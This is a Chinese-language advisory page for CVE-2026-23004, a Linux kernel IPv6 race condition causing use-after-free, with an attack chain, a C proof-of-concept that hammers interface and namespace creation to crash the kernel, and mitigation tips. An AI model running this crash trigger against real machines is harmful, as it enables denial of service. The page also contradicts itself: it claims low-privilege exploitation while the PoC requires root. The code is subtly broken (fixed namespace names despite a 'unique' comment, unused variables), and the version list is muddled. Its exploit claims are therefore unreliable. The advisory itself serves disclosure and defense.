CVE-2026-23004 Linux内核rt6_uncached_list竞态条件导致use-after-free

漏洞信息

漏洞编号

CVE-2026-23004

漏洞类型

竞态条件漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

CVE-2026-23004是Linux内核中的一个高危安全漏洞，存在于IPv6路由子系统的rt6_uncached_list相关函数中。该漏洞由syzbot模糊测试工具发现，攻击者可通过本地低权限访问触发竞态条件，导致内核出现use-after-free错误，最终可能造成系统崩溃或潜在的内核代码执行。漏洞的CVSS评分为7.8，属于高危级别，影响Linux内核多个版本。攻击者无需特殊用户交互即可利用此漏洞，但需要本地访问权限。

技术细节

该漏洞的根本原因在于rt6_uncached_list_del()和rt_del_uncached_list()函数中存在竞态条件。具体问题是在多CPU环境下，rt6_uncached_list_del()函数没有尝试获取ul->lock锁，导致list_empty(&rt->dst.rt_uncached)可能返回错误结果。当WRITE_ONCE(list->next, list)在另一个CPU上完成后，list_empty检查认为列表为空，但实际上列表项仍被其他CPU引用。随后在rt6_uncached_list_flush_dev()中调用list_del_init()和INIT_LIST_HEAD()时，尝试写入已释放的内存(list->prev)，导致KASAN报告slab-use-after-free错误。漏洞表现为在include/linux/list.h:46的INIT_LIST_HEAD()函数中写入list->next成功，但写入list->prev时崩溃，此时@list已被另一个CPU释放。修复方案包括使用list_del_init_careful()和list_empty_careful()原子操作，或确保rt6_uncached_list_del()在rt->dst.rt_uncached_list设置后总是获取自旋锁。该漏洞影响IPv6路由处理，IPv4也需要类似修复。

攻击链分析

STEP 1

步骤1

攻击者获得本地低权限访问权限，创建多个线程并发执行网络接口操作

STEP 2

步骤2

线程同时触发IPv6路由创建和销毁操作，涉及rt6_uncached_list相关函数

STEP 3

步骤3

在多CPU环境下，CPU0执行rt6_uncached_list_del()时未获取ul->lock锁，导致list_empty检查不准确

STEP 4

步骤4

CPU1同时执行rt6_uncached_list_flush_dev()，调用INIT_LIST_HEAD()写入list->next后，CPU0释放了list结构

STEP 5

步骤5

CPU1继续执行INIT_LIST_HEAD()写入list->prev时，访问已释放的内存，触发KASAN use-after-free检测

STEP 6

步骤6

内核崩溃，产生kernel panic，可能导致系统拒绝服务或为后续权限提升提供条件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-23004 - Race condition in rt6_uncached_list_del()
// This PoC demonstrates the race condition that leads to use-after-free
// Compile: gcc -o cve_2026_23004_poc cve_2026_23004_poc.c -lpthread

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <net/if.h>

#define NUM_THREADS 4

void* trigger_race_condition(void* arg) {
    int thread_id = *(int*)arg;
    
    // Trigger network namespace cleanup operations
    // This creates IPv6 routes that will be cleaned up
    int sock = socket(AF_INET6, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket creation failed");
        return NULL;
    }
    
    // Create and delete virtual interfaces rapidly
    // This triggers addrconf_notify -> netif_close_many -> cleanup_net
    for (int i = 0; i < 100; i++) {
        // Rapidly trigger interface changes to cause race in rt6_uncached_list
        system("ip link add dummy0 type dummy 2>/dev/null");
        usleep(1);  // Small delay to increase race window
        system("ip link del dummy0 2>/dev/null");
        usleep(1);
    }
    
    close(sock);
    return NULL;
}

void* trigger_concurrent_cleanup(void* arg) {
    int thread_id = *(int*)arg;
    
    // Create network namespaces and trigger concurrent cleanup
    for (int i = 0; i < 50; i++) {
        system("ip netns add test_ns_XXXX 2>/dev/null");  // Use unique names
        usleep(5);
        system("ip netns del test_ns_XXXX 2>/dev/null");
        usleep(5);
    }
    return NULL;
}

int main() {
    pthread_t threads[NUM_THREADS];
    int thread_ids[NUM_THREADS];
    
    printf("CVE-2026-23004 PoC - Linux kernel rt6_uncached_list race condition\n");
    printf("This requires root privileges and may cause system crash\n");
    
    // Create threads to trigger concurrent network operations
    for (int i = 0; i < NUM_THREADS; i++) {
        thread_ids[i] = i;
        if (i % 2 == 0) {
            pthread_create(&threads[i], NULL, trigger_race_condition, &thread_ids[i]);
        } else {
            pthread_create(&threads[i], NULL, trigger_concurrent_cleanup, &thread_ids[i]);
        }
    }
    
    // Wait for threads
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("PoC execution completed\n");
    printf("Check dmesg for KASAN: slab-use-after-free errors\n");
    
    return 0;
}

影响范围

Linux Kernel < 5.15.y (specific commits needed)

Linux Kernel < 6.1.y (specific commits needed)

Linux Kernel < 6.2.y (specific commits needed)

Linux Kernel < 6.3.y (specific commits needed)

Linux Kernel < 6.4.y (specific commits needed)

Linux Kernel < 6.5.y (specific commits needed)

Linux Kernel < 6.6.y (specific commits needed)

Linux Kernel < 6.7.y (specific commits needed)

Linux Kernel 6.8.x (affected)

防御指南

临时缓解措施

在官方内核补丁发布之前，可采取以下临时缓解措施：1) 限制非特权用户创建网络命名空间和虚拟网络接口的权限；2) 禁用或限制用户对ip命令的访问；3) 使用SELinux或AppArmor限制网络相关的系统调用；4) 监控系统日志中的KASAN错误和内核panic信息；5) 考虑使用grsecurity补丁提供的内核强化功能；6) 如果系统不需要IPv6，可考虑禁用IPv6协议栈以减少攻击面。